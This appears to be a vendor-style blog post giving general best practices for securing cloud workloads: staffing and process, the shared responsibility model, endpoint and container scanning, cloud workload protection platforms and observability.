We’ve posted quite a bit about how more companies are shifting their workloads to the cloud. But a key question is how do you secure those workloads in the cloud? With some many different permutations of cloud workloads, from virtual machines, to endpoints, to containers, getting started with how to secure it all can seem a little overwhelming? So what are some cloud workload security best practices?
First and foremost, you need the right people and policies and organizational structures in place. There’s a saying that organizations don’t have technology problems, they have people and process problems.
Protecting your cloud workloads should begin with having a designated point person to oversee security in the cloud. This person should work closely with devops, devsecops, and other cloud users to understand their business needs, and work with those teams to develop processes and procedures that ensure cloud workloads stay secure. This may include educating employees on their responsibilities with security, common risks, and what procedures or tools should be used to mitigate those risks.
Pay attention to:
Security is everyone’s responsibility, but extending a hand as a partner can go a long way to getting other teams to buy into promoting a culture of continuous security improvement.
To protect your virtual machine workloads, take the following steps:
Remember that under the Shared Responsibility Model your organization is responsible for securing everything in the cloud. That means anti-malware, firewalls, and endpoint security and endpoint posture management solutions need to be put in place on all cloud images.
Many organizations have endpoint protection solutions such as EDR in place, and many EDR vendors have taken steps to adapt their product to cloud deployments. However cloud native solutions are usually a better option.
Container controls can usually be implemented with container image scanning through your vendor. Both Google and AWS offer image scanning services that natively integrate with their products. This makes it easy to automate most vulnerability and checkin scans, and lessens the manual burden on the team. Run time scanning will require a third-party tool, which should be installed into all containers to monitor for attacks.
A relatively new category, cloud workload protection platforms (CWPP) can offer complete security observability for your cloud workloads, collecting and analyzing real-time workload activity in detail—for hosts, VMs, containers, microVMs, and serverless functions—alongside the cloud infrastructure and orchestrator telemetry that acts as the control plane for these cloud-native applications.
The best ones take advantage of industry frameworks such as MITRE ATT&CK, CIS Benchmarks, and SOC 2 to ensure you meet recognized standards for security.
At the end of the day, it’s difficult to secure what you can’t see. Using a cloud-native analytics platform can give you deep insights into behavior, posture, and performance. Implementing tools that allow you to ask any question of your cloud endpoints and get the answers you need is vital to securing complex cloud environments, aid in forensics, and assess weak points and status.
Technology and business requirements are constantly evolving, and not always in the same direction. As the business presses for speed, agility, and flexibility, those needs must be balanced against the necessity for security. The cloud landscape is very much in flux, with many organizations stuck in the middle space between hybrid and fully cloud-native, but following these best practices can give you a good starting point to securing your cloud workloads.